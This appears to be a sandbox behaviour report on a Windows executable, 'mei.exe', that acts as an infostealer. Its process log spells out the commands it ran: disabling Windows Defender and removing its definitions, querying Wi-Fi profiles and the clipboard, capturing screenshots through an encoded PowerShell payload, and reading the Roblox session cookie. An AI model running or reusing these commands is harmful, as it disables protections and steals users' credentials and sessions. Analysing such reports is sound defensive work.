              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\mei.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: mei.exe, 00000001.00000003.2025736451.000002E91417A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: mei.exeVirustotal: Detection: 48%
              Source: mei.exeString found in binary or memory: set-addPolicy
              Source: mei.exeString found in binary or memory: id-cmc-addExtensions
              Source: mei.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: mei.exeString found in binary or memory: --help
              Source: mei.exeString found in binary or memory: --help
              Source: mei.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: mei.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: C:\Users\user\Desktop\mei.exeFile read: C:\Users\user\Desktop\mei.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exe
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exe
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
